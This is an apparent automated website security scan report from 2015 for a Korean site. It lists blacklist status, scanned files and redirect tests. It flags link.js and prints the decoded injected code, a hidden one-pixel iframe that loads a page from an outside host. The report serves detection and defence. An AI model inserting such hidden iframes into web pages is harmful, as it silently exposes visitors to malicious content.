Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=beauty.ac.kr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.beauty.ac.kr/ | HTTP/1.1 200 OK Cache-Control: private Date: Tue, 06 Jan 2015 17:40:26 GMT Server: Microsoft-IIS/6.0 Content-Length: 18873 Content-Type: text/html P3P: CP=NOI CURa ADMa DEVa TAIa OUR DELa BUS IND PHY ONL UNI COM NAV INT DEM PRE Set-Cookie: ASPSESSIONIDAQSCBCRR=NLKOFOPBFIMNGHNJEEPLMMDL; path=/ X-Powered-By: ASP.NET | clean |
http://www.beauty.ac.kr/src/main.asp | 200 OK Content-Length: 21738 Content-Type: text/html | clean |
http://www.beauty.ac.kr/src/../js/link.js | 200 OK Content-Length: 4752 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. function Link(menu){ if(menu=='home'){ parent.location.href="/"; }else if(menu=='sub11'){ parent.location.href="/src/sub11.asp"; }else if(menu=='sub12'){ parent.location.href="/src/sub12.asp"; }else if(menu=='sub13'){ parent.location.href="/src/sub13.asp"; }else if(menu=='sub14'){ parent.location.href="/src/sub14.asp"; }else if(menu=='sub15'){ parent.location. ...[3954 bytes skipped]... Decoded script: <iframe src='http://mail.abc-talk.co.kr/Notice/New/view.html' width='60' height='1' frameborder='0'></iframe> | ||
http://www.beauty.ac.kr/../js/flash.js | 403 Forbidden Content-Length: 32 Content-Type: text/html | clean |
http://www.beauty.ac.kr/test404page.js | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
http://www.beauty.ac.kr/../js/common.js | 403 Forbidden Content-Length: 32 Content-Type: text/html | clean |
http://www.beauty.ac.kr/../js/jquery.js | 403 Forbidden Content-Length: 32 Content-Type: text/html | clean |
http://www.beauty.ac.kr/../js/slider/jquery.mousewheel.min.js | 403 Forbidden Content-Length: 32 Content-Type: text/html | clean |
http://www.beauty.ac.kr/../js/slider/jquery.sliderkit.1.8.min.js | 403 Forbidden Content-Length: 32 Content-Type: text/html | clean |
http://www.beauty.ac.kr/../js/quick.js | 403 Forbidden Content-Length: 32 Content-Type: text/html | clean |
http://www.beauty.ac.kr/../js/cacao_layer.js | 403 Forbidden Content-Length: 32 Content-Type: text/html | clean |
http://www.beauty.ac.kr/js/jquery.banner.js | 200 OK Content-Length: 10490 Content-Type: application/x-javascript | clean |
http://www.googleadservices.com/pagead/conversion.js | 200 OK Content-Length: 10592 Content-Type: text/javascript | clean |
http://wcs.naver.net/wcslog.js | 200 OK Content-Length: 16780 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: beauty.ac.kr
Result:
GET / HTTP/1.1
Host: beauty.ac.kr
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: beauty.ac.kr
Referer: http://www.google.com/search?q=beauty.ac.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: beauty.ac.kr
Referer: http://www.google.com/search?q=beauty.ac.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.